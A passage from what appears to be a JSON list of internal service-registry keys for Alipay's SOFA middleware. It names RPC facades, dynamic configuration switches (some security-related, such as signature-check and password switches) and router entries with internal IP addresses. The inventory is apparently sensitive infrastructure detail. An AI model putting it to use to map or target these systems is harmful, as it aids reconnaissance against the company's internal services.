DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.ActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.65.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.60.40.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.sp.policy.PolicyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_XINLINQI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rulemng.biz.rule.rule.manager.RuleReferenceRecordManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bkmportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.204.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kmi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.basic.common.data.image.ImageUpdateApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.fund.facade.api.MrchTransBookWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.grayctrl.GrayCtrlRecordConfigFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oaProcessAutoAssignCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.securitycap.web.worktask.controller.drm.SecurityRouteThresHold.newFlowThresHold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fincommonbff:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_ACCOUNT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.4.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.finpwmStarMinCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csaccurate.service.facade.mng.api.PolicyQueryService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilelbs.common.service.facade.SmartgisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.45.69.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zcbmarketcenter:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkebppcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:framodelcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.fabs.api.consult.AccountingConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:riskperceptcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_PRODUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipsponsorprod.common.service.facade.api.promo.InviteInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","psbp@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yqcore.common.service.ha3.query.service.Ha3Service:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PrePayAssetConsultDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.wireless.facade.TerminalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@openmonitor#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobileha.biz.manager.QuickInvestigationManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.rest.IntentRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.ignoreSignCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.157.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.ldc.common.event.service.UniformEventRzProxyService:1.0:bkloanapply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofademo.tcc.FirstTccAction:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdop.common.service.facade.OpCustomerProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.metadata.MetaDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.SystemConfigFacade:1.0:antlegalchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.pucprod.EbppInputFieldServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.help.InFlowExchangeCodeWhiteList.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:publiccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oasis.common.service.facade.cluster.manager.ForGatewayJsonService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.128.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.87.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:emcplan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mytradeprod.common.service.facade.EntryBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.IsvAppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.168.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openinsight.common.openplatform.facade.DrmGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductWithPropertiesService:1.0:mobilepos@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdSnippetLockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:permlimitCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.antchain.myentcore.common.service.facade.chainapi.ChainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpIndexQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:creditexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.order.ExecutionOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graycore.common.service.facade.api.graybizroute.GrayBizRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservemng.service.facade.query.TreasuryAccountDetailsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_KABAO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundbankcore.biz.service.facade.test.AsyncSignNotifyEventTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.CloudRiskAnalyseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.fundselling.ProductManageClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.webSiteHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.insdataprod.common.service.facade.mdm.api.MdmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbservindustryprod.common.service.integration.authcenter.AuthenticationFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.punishcenter.common.service.facade.PunishStrategyManageRevertService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.common.service.facade.bank.api.BankPreAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.meta.facade.service.ThirdPartyJarService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirecenter.common.service.facade.api.DisputeJudgeApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.ExpressDigitalSignAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinpromo.common.service.facade.equity.convert.EquityConvertQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-koialphtesttwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:customscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:userAuthorizationCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.accm.facade.AccmDataRevisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imdop.common.service.facade.OpKaCustomerProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RECNEPTUNE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:approdcenter_processcallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.guabus.common.service.facade.api.gua.GuaCreditLimitManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.CompositeTypeDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.module.InsIopPageModuleLevelMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.129.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fingiftprod.common.service.facade.gift.GoldenGiftCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pubiccoreProcessCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.DataSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.155.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.MerchantRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.frequence.FrequenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcdmncore.common.service.facade.api.FieldMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.95.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iaccenter.facade.query.api.AccInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.agaccesstoken.AgATKHavanaMemberViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.prodmsg.ProductLifecycleMessageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_UIOSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.136.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.EmcRecognizeAbilityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofamesh.sofa4RpcMosnServer.facade.Sofa4RpcMosnServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.guaranty.GuarantyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.BizlinkRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.180.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inspectcore.common.service.facade.manage.DataSourceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_LILONG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secuinfos.common.service.facade.api.FocusMapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.ops.OpsCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:alb_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.geofencing.GeofenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:iopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbf.model.service.IPluginService:1.0:tbfalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:m-annual-bill-2020@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openaccess.common.quickaccess.facade.service.proxy.platform.QuickaccessPlatformService:1.0:openacc@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.MbaprodConfigResource.vccRegularIdUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.243.5.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.loadbalancer.LoadBalancerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FRGCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.quotationcore.common.service.facade.api.manual.EventEnhancementManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:chainScanService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.guabus.common.service.facade.api.gua.GuaCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:capacitystudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkcloudfunds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.DocumentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.checker.PaymentCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.cicada.SystemCacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:clive#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ipromotion.common.service.facade.api.campaignv2.CampConsumeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.sms.api.SmsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.113.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecquery.common.service.credit.CreditRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.PermissionMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.suggest.DataBusinessSuggestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcfluxworksProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.SystemNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.220.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.refreshTairCacheTimeInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.core.service.guardian.GuardianTaskCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.caplat.common.service.facade.api.UnifyMessageAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.ADumpUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.UserInvoiceContactOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.arrangement.GeneralARQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.DevLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.shop.ShopBackgroundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.subject.api.SubjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.arrangement.AuthzARQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.ScriptConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pushcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.RiskCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.dish.DishQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.taskcenter.SopOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:dasbi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.drm.SlaveQueryDrm.wFinContractQuerySlave,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instservicegovern.common.facade.client.InstServiceAbilityClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.159.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imif.common.service.facade.api.MerchantContactPersonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.mng.ThirdPartyChannelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdda.facade.adame.AdameDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.152.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.identitydecision.common.service.facade.decision.DecisionFacade:1.0:identitydecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.intopermanager.common.service.facade.api.monitor.MonitorPAIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antrecluse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcBusinessTransFacade:1.0:giftword@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_RCINSPECT_INSPECT_PROCESSING_ORDER_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:atlasstar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finassetpreference.api.facade.FundManagerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.180.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.atd:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fpcmc.common.service.facade.CmcAssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditauthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.smart.SmartAdviseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definprodcenter.facade.api.internal.productagreement.InternalProductAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.RealNameService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.camphome.facade.CampHomeConfigTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:financemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromoscene.facade.account.api.SceneAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.facade.consultant.ConsultantQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zdalproxy.shard_ds_with_rewriteBatchedStatements.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:acpartner@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.202.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchdt.dm.common.service.facade.api.DataSetMetaQueryServiceProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dacuprod.service.facade.DiagnosisReceiptServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINRECONCHECKER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicIndexManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.gmp.miniprogram.ability.common.facade.MiniprogramAbilityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkanalysis.common.service.facade.relation.ExpressRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.ops.iteration.OpsIterationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dqsyncguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.FinDataOperatService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.theme.ThemeConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtesta